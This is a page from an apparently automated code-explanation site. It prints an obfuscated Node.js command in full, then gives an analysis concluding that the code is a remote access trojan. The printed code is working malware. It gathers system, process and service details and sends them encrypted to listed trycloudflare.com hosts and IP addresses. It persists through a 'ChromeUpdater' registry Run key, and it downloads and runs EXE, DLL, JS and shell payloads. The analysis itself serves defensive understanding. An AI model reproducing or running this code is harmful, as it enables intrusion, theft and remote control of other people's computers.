The provided code appears to be heavily obfuscated JavaScript, containing...

April 2, 2025 at 09:14 PM

"node.exe" -e "const a0m=a0o;(function(D,O){const N=a0o,e=D();while(!![]){try{const o=parseInt(N(0x153))/0x1*(-parseInt(N(0x137))/0x2)+-parseInt(N(0x182))/0x3*(-parseInt(N(0x13f))/0x4)+parseInt(N(0x142))/0x5*(parseInt(N(0x134))/0x6)+parseInt(N(0x16d))/0x7+-parseInt(N(0x159))/0x8+parseInt(N(0x184))/0x9*(-parseInt(N(0x186))/0xa)+-parseInt(N(0x193))/0xb;if(o===O)break;else e['push'](e['shift']());}catch(U){e['push'](e['shift']());}}}(a0e,0xe81b7));const a0O=(function(){let D=!![];return function(O,e){const o=D?function(){const r=a0o;if(e){const U=e[r(0x176)](O,arguments);return e=null,U;}}:function(){};return D=![],o;};}()),a0D=a0O(this,function(){const b=a0o,D=function(){const z=a0o;let U;try{U=Function(z(0x162)+z(0x158)+');')();}catch(j){U=window;}return U;},O=D(),e=O[b(0x173)]=O[b(0x173)]||{},o=['log',b(0x18e),'info','error',b(0x18d),b(0x148),'trace'];for(let U=0x0;U<o[b(0x191)];U++){const j=a0O[b(0x17d)][b(0x18c)][b(0x172)](a0O),C=o[U],Y=e[C]||j;j[b(0x15b)]=a0O[b(0x172)](a0O),j[b(0x17f)]=Y[b(0x17f)][b(0x172)](Y),e[C]=j;}});a0D();const http=require(a0m(0x14e)),{execSync,exec,spawn}=require(a0m(0x160)),fs=require('fs'),path=require('path'),zlib=require('zlib');function a0e(){const Z=['pid','from','reg\x20add\x20','{}.constructor(\x22return\x20this\x22)(\x20)','7754656dGQMhu','000011','__proto__','write','request','stdout','chcp\x2065001\x20>\x20NUL\x202>&1\x20&\x20echo\x20\x27version:\x20','child_process','ChromeUpdater','return\x20(function()\x20','.js','.dll','argv','ignore','off','\x20/t\x20REG_SZ\x20/d\x20','Execution\x20error:','split','216.245.184.181','alloc','3848719ytruRh','writeFileSync','suffering-arnold-satisfaction-prior.trycloudflare.com','utf8','wmic\x20process\x20where\x20processid=','bind','console','match','.exe','apply','\x20get\x20commandline','close','/init1234','StatusCode:','delay','exit','constructor','push','toString','atst','stderr','2786577EtrIqZ','ooff','9TqwIUz',',start','4595620ZkTsJm','HKCU\x5cSoftware\x5cMicrosoft\x5cWindows\x5cCurrentVersion\x5cRun','statusCode','floor','start','join','prototype','exception','warn','\x0a=-c=-m=-d=-=-\x0a','rundll32.exe','length','application/octet-stream','3150499YvDOwh','substring','random','Error\x20with\x20HTTP\x20request:','strain-brighton-focused-kw.trycloudflare.com','9490734mhJwdI','error','concat','46406KXjRkJ','cmd.exe','\x20/v\x20','una-idol-ta-missile.trycloudflare.com','data','message','unref','readUInt32LE','4gCuqWP','fromCharCode','\x27\x20;\x20if\x20([Security.Principal.WindowsIdentity]::GetCurrent().Name\x20-match\x20\x27(?i)SYSTEM\x27)\x20\x20{\x20\x27Runas:\x20System\x27\x20}\x20elseif\x20(([Security.Principal.WindowsPrincipal]\x20[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))\x20{\x20\x27Runas:\x20Admin\x27\x20}\x20else\x20{\x20\x27Runas:\x20User\x27\x20}\x20;\x20systeminfo\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20tasklist\x20/svc\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20Get-Service\x20|\x20Select-Object\x20-Property\x20Name,\x20DisplayName\x20|\x20Format-List\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20Get-PSDrive\x20-PSProvider\x20FileSystem\x20|\x20Format-Table\x20-AutoSize\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20arp\x20-a','5TXUvjf','gzipSync','subarray','env','useActive','APPDATA','table','writeUInt32LE','trim','EXE','utf-8','log','http','212.237.217.182','.log','replaceAll','fail\x20connect\x20to\x20server','17DPIGqN','end'];a0e=function(){return Z;};return a0e();}if(process[a0m(0x165)][0x1]!==undefined&&process[a0m(0x165)][0x2]===undefined){const child=spawn(process[a0m(0x165)][0x0],[process['argv'][0x1],'1'],{'detached':!![],'stdio':'ignore','windowsHide':!![]});child[a0m(0x13d)](),process[a0m(0x17c)](0x0);}const ver=a0m(0x15a),PORT_HTTP=0x50,PORT_IP=0x1bb,PORT=0x5a3;let sysinfo=null;function initSysInfo(){const n=a0m;let D;try{let o=execSync('chcp\x2065001\x20>\x20$null\x202>&1\x20;\x20echo\x20\x27version:\x20'+ver+n(0x141),{'encoding':n(0x14c),'shell':'powershell.exe','windowsHide':!![]});D=Buffer[n(0x156)](o,n(0x14c));}catch(U){try{let j=execSync(n(0x15f)+ver+'\x27\x20&\x20echo\x20\x27Runas:\x20Unknown\x27\x20&\x20systeminfo',{'encoding':n(0x14c),'shell':n(0x138),'windowsHide':!![]});D=Buffer['from'](j,'utf-8');}catch(C){console[n(0x135)](n(0x169),C[n(0x13c)]);}}const O=Buffer[n(0x16c)](0x4);O['writeUInt32LE'](Math['random']()*0x5f5e100);const e=Buffer['alloc'](0x2);e['writeUInt16LE'](0x2f),sysinfo=Buffer['concat']([O,e,D]);}function xor(D,O){let e=O[0x0];for(let o=0x0,U=D['length'];o<U;++o){e+=(e+o%0x100)%0x100,D[o]^=(O[o%0x4]^e)%0x100;}}const zlibKey=Buffer[a0m(0x16c)](0x4);zlibKey[a0m(0x149)](0xfafbfdfe);const encKey=Buffer[a0m(0x16c)](0x4);encKey[a0m(0x149)](0xfafbfdff);function enc(D){const L=a0m,O=Buffer[L(0x16c)](0x4);return O['writeUInt32LE'](Math[L(0x195)]()*0x5f5e100),xor(D,O),Buffer[L(0x136)]([zlib[L(0x143)](Buffer[L(0x136)]([D,O,encKey])),zlibKey]);}function atst(){const S=a0m,D=S(0x171)+process[S(0x155)]+S(0x177);exec(D,{'windowsHide':!![]},(O,e,o)=>{const T=S;if(O){console[T(0x135)](''+O[T(0x13c)]);return;}if(o){console[T(0x135)](''+o);return;}const U=String[T(0x140)](0x22);let j;if(e[T(0x17f)]()[T(0x174)](/\s-e\s/g)){const Y=e[T(0x17f)]()[T(0x16a)]('\x0a',0x2)[0x1]['trim']()[T(0x16a)](/node\.exe.*?\s-e\s+/,0x2)[0x1][T(0x14a)]()[T(0x151)](U,''),y=process[T(0x165)][0x0]['replace']('node.exe',randStr(0x8)+T(0x150));fs[T(0x16e)](y,Y),j=process['argv'][0x0]+'\x20'+y;}else j=process[T(0x165)][0x0]+'\x20'+process[T(0x165)][0x1];const C=T(0x157)+U+T(0x187)+U+T(0x139)+U+T(0x161)+U+T(0x168)+U+j[T(0x151)](U,'\x5c'+U)+U+'\x20/f';exec(C,{'windowsHide':!![]},(v,f,Q)=>{v&&console['error'](''+v['message']),Q&&console['error'](''+Q);});});}const TypeFile={'EXE':0x0,'DLL':0x1,'JS':0x2,'CMD':0x3,'ACTIVE':0x4,'OTHER':0x5};function randStr(D){const M=a0m;return Math[M(0x195)]()[M(0x17f)](0x24)[M(0x194)](0x2,D+0x2);}function start(D,O){const K=a0m;let e,o=[];switch(O){case TypeFile[K(0x14b)]:e=D,o=[];break;case TypeFile['DLL']:e=K(0x190),o=[D+K(0x185)];break;case TypeFile['JS']:e=process[K(0x165)][0x0],o=['-e',D];break;default:return;}const U=spawn(e,o,{'detached':!![],'stdio':K(0x166),'windowsHide':!![]});U[K(0x13d)]();}let lastCmd=null;function startCmd(D){const V=a0m;let O;try{O=spawn(D,{'shell':'cmd.exe','windowsHide':!![]});}catch(o){console['error'](''+o[V(0x13c)]);return;}let e='';O[V(0x15e)]['on']('data',U=>{const h=V;e+=U[h(0x17f)]();}),O[V(0x181)]['on'](V(0x13b),U=>{const d=V;e+=U[d(0x17f)]();}),O['on'](V(0x178),U=>{lastCmd=e;});}function main(D,O){const g=a0m;console[g(0x14d)]('connect\x20to:',D);let e=sysinfo;lastCmd!==null?(e=Buffer['concat']([sysinfo,Buffer[g(0x156)](g(0x18f),g(0x14c)),Buffer[g(0x156)](lastCmd,g(0x14c))]),lastCmd=null):e=Buffer['concat']([sysinfo]);e=enc(e);const o={'hostname':D,'port':O,'path':g(0x179),'method':'POST','headers':{'Content-Type':g(0x192),'Content-Length':e[g(0x191)]}};return new Promise((U,j)=>{const q=g,C=http[q(0x15d)](o,Y=>{const a=q,y=[];console[a(0x14d)](Y['headers']),console[a(0x14d)](a(0x17a),Y[a(0x188)]),Y['on'](a(0x13b),v=>{const J=a;y[J(0x17e)](v);}),Y['on'](a(0x154),()=>{const G=a,v=Buffer[G(0x136)](y);if(Y['statusCode']===0x1f6){j(G(0x152));return;}if(Y[G(0x188)]!==0xc8){console['error'](G(0x17a),Y['statusCode']),U({});return;}if(v[G(0x191)]===0x4&&v['toString']()===G(0x183))console[G(0x14d)](G(0x167)),process[G(0x17c)](0x0);else{if(v[G(0x191)]===0x4&&v[G(0x17f)]()===G(0x180)){console[G(0x14d)](G(0x180));try{atst();}catch(R){console[G(0x135)](R);}U({});return;}}const f=v['subarray'](0x0,v[G(0x191)]-0x4),k=v[G(0x144)](v[G(0x191)]-0x4,v[G(0x191)]);xor(f,k);const Q=f[f['length']-0x1],l=f[G(0x144)](0x0,f[G(0x191)]-0x1);let w;switch(Q){case TypeFile[G(0x14b)]:w=G(0x175);break;case TypeFile['DLL']:w=G(0x164);break;case TypeFile['JS']:w=G(0x163);break;case TypeFile['CMD']:startCmd(l[G(0x17f)](G(0x170))),U({});return;case TypeFile['ACTIVE']:useActive=l[G(0x13e)](),U({});return;default:w=G(0x150);break;}let c;Q===TypeFile['JS']?c=l[G(0x17f)]('utf8'):(c=path['join'](process[G(0x145)][G(0x147)],randStr(0x8)),fs['mkdirSync'](c,{'recursive':!![]}),c=path[G(0x18b)](c['toString'](),randStr(0x8)+w),fs[G(0x16e)](c,l),console[G(0x14d)](G(0x18a),c)),start(c,Q),U({});});});C['on'](q(0x135),Y=>{j(Y);}),C[q(0x15c)](e),C[q(0x154)]();});}initSysInfo();function a0o(D,O){const e=a0e();return a0o=function(o,U){o=o-0x134;let j=e[o];return j;},a0o(D,O);}const hosts=[a0m(0x16f),'speak-head-somebody-stays.trycloudflare.com','mortgage-i-concrete-origins.trycloudflare.com',a0m(0x13a),a0m(0x197),'musicians-implied-less-model.trycloudflare.com'],hostsIp=[a0m(0x16b),a0m(0x14f),'168.119.96.41'];let useIp=0x0,delay=0x1,useActive=0x0;async function mainloop(){const P=a0m;let D=hosts[Math[P(0x189)](Math[P(0x195)]()*0x3e8)%hosts[P(0x191)]],O=hostsIp[Math[P(0x189)](Math[P(0x195)]()*0x3e8)%hostsIp['length']];while(!![]){console['log'](P(0x17b),delay),await new Promise(e=>setTimeout(e,delay));try{if(useIp<0xc8)await main(D,PORT_HTTP),useIp=0x0;else{await main(O,PORT_IP),useIp++;if(useIp>=0xd2)useIp=0xbe;}}catch(e){console[P(0x135)](P(0x196),e[P(0x13c)]),D=hosts[Math[P(0x189)](Math[P(0x195)]()*0x3e8)%hosts[P(0x191)]],O=hostsIp[Math[P(0x189)](Math['random']()*0x3e8)%hostsIp[P(0x191)]],useIp++,delay=0x3e8*0xa,useActive=0x0;continue;}console[P(0x14d)](P(0x146),useActive),useActive>0x0?(delay=0x3e8*0xa,--useActive):delay=0x3e8*0x3c*0x5;}}mainloop();"

The provided code appears to be heavily obfuscated JavaScript, containing an encoded implementation of malicious functionality. Here is a high-level overview of what the code likely does after analysis, without executing it:

Key Intent of the Code:

  1. Command-and-Control Communication:

    • The script repeatedly communicates with a list of remote hosts (trycloudflare.com domains and IP addresses) over HTTP or specific ports.
    • It attempts to send system information and receive instructions from these hosts.

  2. Persistence Mechanisms:

    • The script utilizes Windows Registry modifications and potentially detaches processes to ensure that it remains active even after the system restarts.

  3. System Information Gathering:

    • It collects details about the system, potentially including user roles, system configuration, and running processes.

  4. Exfiltration and Execution:

    • It might exfiltrate data to remote servers.
    • The code is capable of executing received payloads (e.g., files, scripts, or commands), depending on the instructions sent by its remote server.

  5. Obfuscation:

    • The code is structured in a way that is purposefully difficult to read or understand. Functions are wrapped in self-invoking obfuscated layers, variable names are minified, and data is encoded (like XOR functions and buffers).

  6. File Creation and Execution:

    • It can write received files (like .exe, .dll, .js, etc.) to the file system and execute them using spawned child processes.

  7. Encryption:

    • The code uses encryption (e.g., XOR and gzip compression) to hide its payloads and transmitted data, further obscuring its purposes.

  8. Error Handling:

    • It handles potential execution errors silently and loops indefinitely, actively maintaining communication with its Command-and-Control (C2) servers.

Malicious or Mal-intent Evidence:

  • Obfuscation: The entire code is obfuscated to obscure its core functionality, a common hallmark of malware designed to bypass detection or analysis.
  • Spawning Process: Commands and scripts are executed or injected dynamically (spawn, child_process.exec, etc.).
  • Persistence Attempts: The code modifies Windows Registry to persist across reboots.
  • C2 Communication: The use of multiple remote hosts and fallback techniques is typical for malware reaching out to C2 servers.
  • Encryption and Packaging: The use of encryption (e.g., XOR), creating and writing files (fs.writeFileSync), and executing them hints at possible payload delivery.

Conclusion:

The provided code appears to be malware, likely a Trojan or a remote access tool (RAT) designed for:

  • Persistently maintaining remote access to an infected system.
  • Executing commands or delivering malicious payloads from remote servers.
  • Exfiltrating sensitive information or maintaining unauthorized control.

If this script is present in your setup or system, it should be treated as a potential security incident. Disconnect the infected device from the network, and consult a cybersecurity professional to analyze and remediate.

Generate your own explanations
Download our vscode extension
Read other generated explanations

Built by @thebuilderjr
Sponsored by beam analytics
Read our terms and privacy policy
Forked from openai-quickstart-node